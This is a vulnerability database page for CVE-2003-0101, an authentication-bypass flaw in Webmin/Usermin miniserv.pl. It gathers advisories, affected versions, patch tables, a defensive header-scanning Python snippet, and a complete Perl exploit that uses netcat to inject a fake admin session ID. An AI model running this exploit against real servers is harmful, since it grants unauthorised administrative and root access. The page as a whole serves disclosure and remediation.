CVE-2003-0101
CVSS 10.0
Published: 2003-03-03 00:00:00
Last revised: 2016-10-17 22:29:30

[Original] miniserv.pl in (1) Webmin before 1.070 and (2) Usermin before 1.000 does not properly handle metacharacters such as line feeds and carriage returns (CRLF) in Base-64 encoded strings during Basic authentication, which allows remote attackers to spoof a session ID and gain root privileges.


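[CNNVD] Webmin/Usermin miniserv.pl Remote Unauthorized Access Vulnerability (CNNVD-200303-005)

        A vulnerability exists in miniserv.pl in (1) Webmin before 1.070 and (2) Usermin before 1.000. It stems from improper handling of metacharacters such as line feeds and carriage returns in Base-64 encoded strings during Basic authentication. A remote attacker can exploit this vulnerability to spoof a session ID and gain root privileges.

- CVSS (Base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected platforms and products)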

cpe:/a:usermin:usermin:0.5
cpe:/a:usermin:usermin:0.4
cpe:/a:usermin:usermin:0.9
cpe:/a:usermin:usermin:0.8
cpe:/a:usermin:usermin:0.7
cpe:/a:usermin:usermin:0.6
cpe:/a:usermin:usermin:0.94
cpe:/a:usermin:usermin:0.93
cpe:/a:usermin:usermin:0.96
cpe:/a:usermin:usermin:0.95
cpe:/a:usermin:usermin:0.92
cpe:/a:engardelinux:guardian_digital_webtool:1.2  (Engarde Guardian Digital WebTool 1.2)
cpe:/a:usermin:usermin:0.91
cpe:/a:usermin:usermin:0.98
cpe:/a:usermin:usermin:0.97
cpe:/a:webmin:webmin:1.0.50
cpe:/a:webmin:webmin:1.0.60
cpe:/a:usermin:usermin:0.99

- OVAL (Technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0101
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0101
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-005
(Official data source) CNNVD

- Other links and resources

ftp://patches.sgi.com/support/free/security/advisories/20030602-01-I
(UNKNOWN)  SGI  20030602-01-I
http://archives.neohapsis.com/archives/hp/2003-q1/0063.html
(UNKNOWN)  HP  HPSBUX0303-250
http://archives.neohapsis.com/archives/linux/engarde/2003-q1/0008.html
(UNKNOWN)  ENGARDE  ESA-20030225-006
http://marc.info/?l=bugtraq&m=104610245624895&w=2
(UNKNOWN)  BUGTRAQ  20030224 Webmin 1.050 - 1.060 remote exploit
http://marc.info/?l=bugtraq&m=104610300325629&w=2
(UNKNOWN)  BUGTRAQ  20030224 [SNS Advisory No.62] Webmin/Usermin Session ID Spoofing Vulnerability "Episode 2"
http://marc.info/?l=bugtraq&m=104610336226274&w=2
(UNKNOWN)  BUGTRAQ  20030224 GLSA: usermin (200302-14)
http://marc.info/?l=webmin-announce&m=104587858408101&w=2
(UNKNOWN)  CONFIRM  http://marc.info/?l=webmin-announce&m=104587858408101&w=2
http://www.ciac.org/ciac/bulletins/n-058.shtml
(UNKNOWN)  CIAC  N-058
http://www.debian.org/security/2003/dsa-319
(UNKNOWN)  DEBIAN  DSA-319
http://www.iss.net/security_center/static/11390.php
(VENDOR_ADVISORY)  XF  webmin-usermin-root-access(11390)
http://www.lac.co.jp/security/english/snsadv_e/62_e.html
(UNKNOWN)  MISC  http://www.lac.co.jp/security/english/snsadv_e/62_e.html
http://www.linuxsecurity.com/advisories/gentoo_advisory-2886.html
(UNKNOWN)  CONFIRM  http://www.linuxsecurity.com/advisories/gentoo_advisory-2886.html
http://www.mandriva.com/security/advisories?name=MDKSA-2003:025
(UNKNOWN)  MANDRAKE  MDKSA-2003:025
http://www.securityfocus.com/bid/6915
(UNKNOWN)  BID  6915
http://www.securitytracker.com/id?1006160
(UNKNOWN)  SECTRACK  1006160

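- Vulnerability information

Webmin/Usermin miniserv.pl Remote Unauthorized Access Vulnerability
Critical  Input validation
2003-03-03 00:00:00 2012-11-30 00:00:00
Remote
        A vulnerability exists in miniserv.pl in (1) Webmin before 1.070 and (2) Usermin before 1.000. It stems from improper handling of metacharacters such as line feeds and carriage returns in Base-64 encoded strings during Basic authentication. A remote attacker can exploit this vulnerability to spoof a session ID and gain root privileges.

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the risk:
        * If you do not need this tool, remove it with the following command:
        versions remove websetup
        Vendor patch:
        SGI
        ---
        SGI has released a security advisory (20030602-01-I) and corresponding patches for this issue:
        20030602-01-I: WebSetup / WebMin Security Vulnerability on IRIX
        Link: ftp://patches.sgi.com/support/free/security/advisories/20030602-01-I
        SGI recommends that users upgrade to IRIX 6.5.20 or upgrade Websetup to V3.5.
        Patch status:
         OS version    Vulnerable?   Patch #   Notes
         ----------    -----------   -------   -------------
         IRIX 3.x      unknown                 Note 1
         IRIX 4.x      unknown                 Note 1
         IRIX 5.x      unknown                 Note 1
         IRIX 6.0.x    unknown                 Note 1
         IRIX 6.1      unknown                 Note 1
         IRIX 6.2      unknown                 Note 1
         IRIX 6.3      unknown                 Note 1
         IRIX 6.4      unknown                 Note 1
         IRIX 6.5      yes                     Notes 2 & 3
         IRIX 6.5.1    yes                     Notes 2 & 3
         IRIX 6.5.2    yes                     Notes 2 & 3
         IRIX 6.5.3    yes                     Notes 2 & 3
         IRIX 6.5.4    yes                     Notes 2 & 3
         IRIX 6.5.5    yes                     Notes 2 & 3
         IRIX 6.5.6    yes                     Notes 2 & 3
         IRIX 6.5.7    yes                     Notes 2 & 3
         IRIX 6.5.8    yes                     Notes 2 & 3
         IRIX 6.5.9    yes                     Notes 2 & 3
         IRIX 6.5.10   yes                     Notes 2 & 3
         IRIX 6.5.11   yes                     Notes 2 & 3
         IRIX 6.5.12   yes                     Notes 2 & 3
         IRIX 6.5.13   yes                     Notes 2 & 3
         IRIX 6.5.14   yes                     Notes 2 & 3
         IRIX 6.5.15   yes                     Notes 2 & 3
         IRIX 6.5.16   yes                     Notes 2 & 3
         IRIX 6.5.17   yes                     Notes 2 & 3
         IRIX 6.5.18   yes                     Notes 2 & 3
         IRIX 6.5.19   yes                     Notes 2 & 3
         IRIX 6.5.20   no

        Notes:

        1) This version of IRIX is no longer maintained. Please upgrade to a supported version; see
        http://support.sgi.com/irix/news/index.html#policy
        for more information.
        2) If you have not yet received an IRIX 6.5.x for IRIX 6.5 CD, contact SGI support or visit:
        http://support.sgi.com

        3) Upgrade to IRIX 6.5.20, or install websetup v3.5 from the IRIX 6.5.20 Applications CD, which can be downloaded from:
        ftp://patches.sgi.com/support/free/security/patches/6.5.20/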

- Vulnerability information (22275)

Webmin 0.9x, Usermin 0.9x/1.0 Session ID Spoofing Unauthenticated Access Vulnerability (EDBID:22275)
linux remote
2003-02-20 Verified
0 Carl Livitt
N/A
source: http://www.securityfocus.com/bid/6915/info

A vulnerability has been discovered in the 'Miniserv.pl' script used to invoke both Webmin and Usermin. Due to insufficient sanitization of client-supplied BASE64 encoded input, it is possible to inject a Session ID into the access control list.

Successful exploitation of this vulnerability may allow an attacker to bypass typical authentication procedures, thus gaining administrative access to a webmin/usermin interface.


#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";

$nc="/usr/bin/netcat";

if($#ARGV == -1) {
	print "Syntax:\n\t$0 hostname\n";
	exit(1);
}

$hostname=$ARGV[0];

if ( ! -x $nc ) {
	print "netcat not found!\n";
	exit(2);
}

open(NC, "|$nc $hostname 10000 >& /dev/null");
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);

print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";


		

- Vulnerability information

10803
Webmin/Usermin miniserv.pl Base-64 String Metacharacter Handling Session Spoofing
Remote / Network Access Authentication Management, Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

Webmin and Usermin both contain a flaw that may allow a malicious user to gain access. The issue is due to a lack of proper sanitization for input supplied to the miniserv.pl script. If an attacker has knowledge of a valid username, that person can spoof a session ID, which is then added to the access control list, giving the attacker full access to the system (and thus root privileges on the system running the vulnerable program).

- Timeline

2003-02-24 2003-02-19
2003-02-24 Unknown

- Solution

Upgrade to version 1.070 or higher for Webmin and 1.000 or higher for Usermin, as these versions are known to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

Webmin/Usermin Session ID Spoofing Unauthenticated Access Vulnerability
Input Validation Error 6915
Yes No
2003-02-20 12:00:00 2009-07-11 08:06:00
The discovery of this vulnerability has been credited to Keigo Yamazaki and Cintia M. Imanishi.

- Affected software versions

Webmin Webmin 1.0 60
Webmin Webmin 1.0 50
Webmin Webmin 0.990
Webmin Webmin 0.970
Webmin Usermin 0.99
+ Mandriva Linux Mandrake 9.0
Webmin Usermin 0.98
+ HP Apache-Based Web Server 2.0.43 .00
+ HP Apache-Based Web Server 1.3.27 .00
+ HP Webmin-Based Admin 1.0 .01
Webmin Usermin 0.97
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
Webmin Usermin 0.96
Webmin Usermin 0.95
Webmin Usermin 0.94
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
Webmin Usermin 0.93
Webmin Usermin 0.92
Webmin Usermin 0.91
Webmin Usermin 0.9
Webmin Usermin 0.8
Webmin Usermin 0.7
Webmin Usermin 0.6
Webmin Usermin 0.5
Webmin Usermin 0.4
SGI IRIX 6.5.19
SGI IRIX 6.5.18
SGI IRIX 6.5.17
SGI IRIX 6.5.16
SGI IRIX 6.5.15
SGI IRIX 6.5.14
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
SCO OpenLinux Workstation 3.1.1
SCO OpenLinux Server 3.1.1
HP Webmin-Based Admin 1.0 .01
- HP HP-UX 11.22
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
HP Apache-Based Web Server 2.0.43 .00
- HP HP-UX 11.22
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
HP Apache-Based Web Server 1.3.27 .00
- HP HP-UX 11.22
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
EnGarde Guardian Digital WebTool 1.2
Webmin Webmin 1.0 70
+ HP Apache-Based Web Server 1.3.27 .01
+ HP Apache-Based Web Server 1.3.27 .01
+ HP Webmin-Based Admin 1.0.1 .01
+ HP Webmin-Based Admin 1.0.1 .01
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
Webmin Usermin 1.0
SGI IRIX 6.5.20

- Unaffected software versions

Webmin Webmin 1.0 70
+ HP Apache-Based Web Server 1.3.27 .01
+ HP Apache-Based Web Server 1.3.27 .01
+ HP Webmin-Based Admin 1.0.1 .01
+ HP Webmin-Based Admin 1.0.1 .01
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
Webmin Usermin 1.0
SGI IRIX 6.5.20

- Vulnerability discussion

A vulnerability has been discovered in the 'Miniserv.pl' script used to invoke both Webmin and Usermin. Due to insufficient sanitization of client-supplied BASE64 encoded input, it is possible to inject a Session ID into the access control list.

Successful exploitation of this vulnerability may allow an attacker to bypass typical authentication procedures, thus gaining administrative access to a webmin/usermin interface.
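
A detection-side illustration of the flaw described above, added here and not taken from Webmin, Usermin or any of the referenced advisories: it decodes the Base64 token of each Basic Authorization header and flags decoded credentials that contain CR, LF or other control bytes. The function names and the sample header lines are constructed for this example.

```python
import base64
import binascii
import re

# Matches an HTTP Basic Authorization header line (header name is case-insensitive).
_AUTH_RE = re.compile(r"^authorization:\s*basic\s+(\S+)\s*$", re.I)

def check_basic_credentials(header_line):
    """Return (verdict, detail); verdict is not-basic, malformed, suspicious or ok."""
    m = _AUTH_RE.match(header_line.strip())
    if not m:
        return ("not-basic", "")
    try:
        decoded = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return ("malformed", "token is not valid Base64")
    # Control bytes (including CR and LF) never belong in user:password.
    bad = sorted({b for b in decoded if b < 0x20 or b == 0x7F})
    if bad:
        names = ", ".join("0x%02x" % b for b in bad)
        return ("suspicious", "control bytes in decoded credentials: " + names)
    if b":" not in decoded:
        return ("malformed", "no user:password separator")
    return ("ok", "")

def scan_requests(header_lines):
    """Return [(line_number, detail)] for every suspicious header line."""
    hits = []
    for n, line in enumerate(header_lines, 1):
        verdict, detail = check_basic_credentials(line)
        if verdict == "suspicious":
            hits.append((n, detail))
    return hits

def _basic(raw):
    return "Authorization: Basic " + base64.b64encode(raw).decode("ascii")

# Constructed sample header lines (not captured traffic).
SAMPLE = [
    "Host: admin.example.test",
    _basic(b"alice:correct horse"),
    _basic(b"alice:pw\nextra line"),
    _basic(b"bob:pw\r\nextra line"),
    "Authorization: Basic !!!not-base64!!!",
]

if __name__ == "__main__":
    for n, detail in scan_requests(SAMPLE):
        print("line %d: %s" % (n, detail))
```

The same check belongs on the server side before the decoded value reaches any line-oriented store or log; here it is applied to header lines pulled from a proxy or packet capture.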

- Exploit

The following exploit has been made available by Carl Livitt <carl@learningshophull.co.uk>.

- Solution

It is recommended that all Gentoo Linux users who are running
app-admin/webmin upgrade to webmin-1.070 as follows:

emerge sync
emerge -u webmin
emerge clean

Gentoo Linux has recommended that users who are running app-admin/usermin upgrade to usermin-1.000 as follows:

emerge sync
emerge -u usermin
emerge clean

EnGarde Secure Linux has released an advisory and fixes for the Guardian Digital WebTool. Users are advised to upgrade as soon as possible.

HP has made fixes available. See referenced advisory HPSBUX0303-250 for additional details.

SGI IRIX 6.5.x releases include the websetup package, which includes vulnerable versions of Webmin. websetup versions prior to 3.5 are prone to this issue. An updated version of websetup is available with the IRIX 6.5.20 Applications CD. Users are advised to upgrade to IRIX 6.5.20 or download a patched version of websetup from SGI.

Debian has released a security advisory (DSA 319-1) containing fixes to address this issue. Further information on how to obtain and apply fixes can be found in the attached advisory.

SCO has released an advisory (CSSA-2003-035.0) for OpenLinux that includes updates to address this issue.

The vendor has released updates which address this issue:


Webmin Usermin 0.4

Webmin Usermin 0.5

Webmin Usermin 0.6

Webmin Usermin 0.7

Webmin Usermin 0.8

Webmin Usermin 0.9

Webmin Usermin 0.91

Webmin Usermin 0.92

Webmin Usermin 0.93

Webmin Usermin 0.94

Webmin Usermin 0.95

Webmin Usermin 0.96

Webmin Usermin 0.97

Webmin Webmin 0.970

Webmin Usermin 0.98

Webmin Usermin 0.99

Webmin Webmin 1.0 50

Webmin Webmin 1.0 60

EnGarde Guardian Digital WebTool 1.2

HP Apache-Based Web Server 1.3.27 .00

SCO OpenLinux Workstation 3.1.1

SCO OpenLinux Server 3.1.1

SGI IRIX 6.5

SGI IRIX 6.5.1

SGI IRIX 6.5.10

SGI IRIX 6.5.11

SGI IRIX 6.5.12

SGI IRIX 6.5.13

SGI IRIX 6.5.14

SGI IRIX 6.5.15

SGI IRIX 6.5.16

SGI IRIX 6.5.17

SGI IRIX 6.5.18

SGI IRIX 6.5.19

SGI IRIX 6.5.2

SGI IRIX 6.5.3

SGI IRIX 6.5.4

SGI IRIX 6.5.5

SGI IRIX 6.5.6

SGI IRIX 6.5.7

SGI IRIX 6.5.8

SGI IRIX 6.5.9

- Related references
